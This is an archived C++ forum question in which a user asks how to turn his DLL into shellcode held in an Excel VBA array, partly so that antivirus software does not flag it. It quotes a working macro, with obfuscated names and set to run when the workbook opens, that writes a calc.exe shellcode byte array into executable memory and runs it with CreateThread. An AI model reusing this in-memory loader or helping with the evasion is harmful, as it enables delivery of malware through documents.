C++

Forum

 
Extrat SHELLCODE from my dll ?

JAAFAR (19)
Hi all,

I have written a 64bit C++ dll in Visual Studio Community 2017 and I am using it successfully in Excel/VBA .

Now, in order for the Client VBA application to use the dll ,I have to distribute the dll file along with VBA application and the dll file has to be saved to the client's Disk.

This can pose a problem with some AV software as well as it affects the portability of the Client VBA application.

My idea is to be able to extract the shellcode from the dll and store this shellcode in a vba array within the client vba program itself so that the dll can be loaded directly from the vba array instead of being loaded in memory from the dll file on Disk.

I have seen this done like in the following vba code which stores calc.exe shellcode in an array and then runs calculator program on the fly.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
 
Sub Afutfo_Open()
    Dim Wkbiqmw As Long, Hmbo As Variant, Rwvxs As Long, Xinzcm As Long, Abegogwui As Long
    Hmbo = Array(232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, _
139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, _
13, 1, 199, 226, 240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, _
116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, _
214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, _
36, 117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, _
139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, _
235, 134, 93, 106, 1, 141, 133, 185, 0, 0, 0, 80, 104, 49, 139, 111, 135, 255, 213, 187, _
224, 29, 42, 10, 104, 166, 149, 189, 157, 255, 213, 60, 6, 124, 10, 128, 251, 224, 117, 5, _
187, 71, 19, 114, 111, 106, 0, 83, 255, 213, 99, 97, 108, 99, 0)
    Rwvxs = VirtualAlloc(0, UBound(Hmbo), &H1000, &H40)
    For Abegogwui = LBound(Hmbo) To UBound(Hmbo)
        Wkbiqmw = Hmbo(Abegogwui)
        Xinzcm = RtlMoveMemory(Rwvxs + Abegogwui, Wkbiqmw, 1)
    Next Abegogwui
    Xinzcm = CreateThread(0, 0, Rwvxs, 0, 0, 0)
End Sub



Does anybody have an idea how we can extract the dll shellcode so we can use it as explained above ?

Thank you in advance.
Last edited on
Topic archived. No new replies allowed.